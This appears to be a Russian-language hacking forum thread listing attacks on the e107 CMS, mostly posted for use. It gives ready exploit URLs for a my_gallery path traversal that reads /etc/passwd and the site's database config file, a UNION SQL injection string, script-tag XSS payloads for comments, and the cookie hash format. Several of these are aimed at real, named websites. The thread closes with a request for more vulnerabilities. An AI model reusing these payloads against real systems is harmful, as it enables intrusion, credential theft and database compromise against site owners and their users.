Очень интересное наблюдение!

В движке е107 имеется возможность показывать аватары с других ресурсов, однако никакой проверки контента не существует, и вставив например ссылку со сплойтом вместо аватары, она сработает как Iframe, и хрен её заметишь =)) (ибо img src= и iframe= работают по одному принципу подгрузки контента)


Решение: Отключить нафиг эту функцию показа аватары с удалённого ресурса =)).

e107 Plugin my_gallery 2.4.1 Exploit
 

e107 Plugin my_gallery 2.4.1 Exploit

Class: Input Validation Error
Remote: Yes
Vulnerable: e107.org my_gallery 2.4.1
e107.org my_gallery 2.3
e107.org my_gallery 0

1.image.php?file='; это в файле image постом выше


2.Читалка файлов

Файл dload.php

все тоже самое тока в еще одном файле

Пример : __http://www.verrechiaswords.com/e107_plugins/my_gallery/dload.php?file=/etc/passwd


там он вам даст сохранить картинку, сохраняем, открываем в блокноте и видим след строчки

*conf DB

http://www.verrechiaswords.com/e107_plugins/my_gallery/dload.php?file=../../e107_config.php

На самом деле експлоит написан был раньше http://milw0rm.com/exploits/5308

XSS в модуле YouTube Gallery(ytm_gallery):
© Nightmare

e107(e107_v0.7.16_standart_RUS)


active XSS in comment's news
Submit comment
Subject: <script>alert(//)</script>
Comment:<script>alert(//)</script>

куки имеют вид:
1.1a1dc91c907325c69271ddf0c944bc72
id.md5(pass)


при инстале префикс таблиц не фильтруется

активки не во всех сборках, в норм версиях фильтрация стоит.

SQL injection in e107 cms
Version = v0.7 or later
SQL
http://localhost/plugins/userjournals_menu/userjournals.php?blog.[SQL]

1:
2:
bug site:
http://www.shanomaac.com/e107_plugins/userjournals_menu/userjournals.php?blog.-1%20union%20all%20select%201,2,null,4,5,6,@@versio n,8,9,0,11,12,13--

Межсайтовый скриптинг e107 ветки 0.x

Оно не загружает, оно просто показывает изображение ;) , пробывал но ничего не получилось.

Поскажите какие есть уязвимости на 0.7.11 , очень надо.